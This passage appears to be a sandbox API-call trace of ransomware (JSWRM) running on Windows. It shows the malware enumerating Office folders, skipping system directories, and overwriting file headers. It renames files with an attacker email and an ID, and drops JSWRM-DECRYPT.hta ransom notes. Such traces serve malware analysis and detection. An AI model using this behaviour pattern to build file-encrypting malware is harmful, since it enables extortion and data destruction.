[0113.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0113.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.602] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4580dcb, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x4580dcb, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4580dcb, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x10d, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="BASIC.HTM", cAlternateFileName="")) returned 1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2=".") returned 1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="..") returned 1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="...") returned 1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="windows") returned -1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="recovery") returned -1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="perflogs") returned -1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="documents and settings") returned -1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="$RECYCLE.BIN") returned 1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="system volume information") returned -1 [0113.602] lstrcmpiW (lpString1="BASIC.HTM", lpString2="msocache") returned -1 [0113.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0113.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC.HTM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC.HTM", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC.HTM", lpUsedDefaultChar=0x0) returned 9 [0113.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0113.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC.HTM", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0113.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BASIC.HTM", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BASIC.HTM", lpUsedDefaultChar=0x0) returned 9 [0113.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0113.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2254c0 [0113.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0113.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.603] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0113.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BASIC.HTM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\basic.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.603] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=269) returned 1 [0113.604] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0113.604] ReadFile (in: hFile=0x238, lpBuffer=0x1f19f0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x1f19f0*, lpNumberOfBytesRead=0x345e89c*=0x100, lpOverlapped=0x0) returned 1 [0113.605] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.605] WriteFile (in: hFile=0x238, lpBuffer=0x1f19f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x1f19f0*, lpNumberOfBytesWritten=0x345e898*=0x100, lpOverlapped=0x0) returned 1 [0113.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0113.605] CloseHandle (hObject=0x238) returned 1 [0113.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0113.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0113.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0113.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0113.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0113.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.605] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BASIC.HTM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\basic.htm"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\BASIC.HTM.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\basic.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0113.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0113.606] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4ba375b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4ba375b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4ba375b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4a60, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="BCSRuntimeRes.dll", cAlternateFileName="BCSRUN~1.DLL")) returned 1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2=".") returned 1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="..") returned 1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="...") returned 1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="windows") returned -1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="recovery") returned -1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="perflogs") returned -1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="documents and settings") returned -1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="$RECYCLE.BIN") returned 1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="system volume information") returned -1 [0113.606] lstrcmpiW (lpString1="BCSRuntimeRes.dll", lpString2="msocache") returned -1 [0113.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCSRuntimeRes.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCSRuntimeRes.dll", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCSRuntimeRes.dll", lpUsedDefaultChar=0x0) returned 17 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCSRuntimeRes.dll", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0113.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCSRuntimeRes.dll", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCSRuntimeRes.dll", lpUsedDefaultChar=0x0) returned 17 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0113.607] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef9622ad, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef9622ad, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xef9622ad, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3058, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="BHOINTL.DLL", cAlternateFileName="")) returned 1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2=".") returned 1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="..") returned 1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="...") returned 1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="windows") returned -1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="recovery") returned -1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="perflogs") returned -1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="documents and settings") returned -1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="system volume information") returned -1 [0113.607] lstrcmpiW (lpString1="BHOINTL.DLL", lpString2="msocache") returned -1 [0113.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BHOINTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BHOINTL.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BHOINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BHOINTL.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BHOINTL.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BHOINTL.DLL", lpUsedDefaultChar=0x0) returned 11 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0113.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0113.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0113.607] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2=".") returned 1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="..") returned 1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="...") returned 1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="windows") returned -1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="recovery") returned -1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="perflogs") returned -1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="documents and settings") returned -1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="$RECYCLE.BIN") returned 1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="system volume information") returned -1 [0113.608] lstrcmpiW (lpString1="Bibliography", lpString2="msocache") returned -1 [0113.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0113.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0113.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0113.608] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0113.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\jswrm-decrypt.hta")) returned 0xffffffff [0113.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0113.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0113.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0113.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0113.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0113.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.610] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0113.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.611] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.611] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0113.612] CloseHandle (hObject=0x238) returned 1 [0113.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0113.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0113.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0113.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0113.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0113.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.613] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\bibliography\\jswrm-decrypt.hta")) returned 0x20 [0113.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0113.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0113.613] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\Bibliography\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3a60c80f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0113.613] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0113.613] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x3a60c80f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0113.613] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0113.613] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0113.613] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ac4a8a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ac4a8a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ac4a8a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1b2ce, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="BIBFORM.XML", cAlternateFileName="")) returned 1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2=".") returned 1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="..") returned 1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="...") returned 1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="windows") returned -1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="recovery") returned -1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="perflogs") returned -1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="documents and settings") returned -1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="$RECYCLE.BIN") returned 1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="system volume information") returned -1 [0113.613] lstrcmpiW (lpString1="BIBFORM.XML", lpString2="msocache") returned -1 [0113.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0113.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIBFORM.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIBFORM.XML", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIBFORM.XML", lpUsedDefaultChar=0x0) returned 11 [0113.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0113.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIBFORM.XML", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BIBFORM.XML", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BIBFORM.XML", lpUsedDefaultChar=0x0) returned 11 [0113.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0113.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0113.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0113.614] CreateFileW (lpFileName="C:\\Program 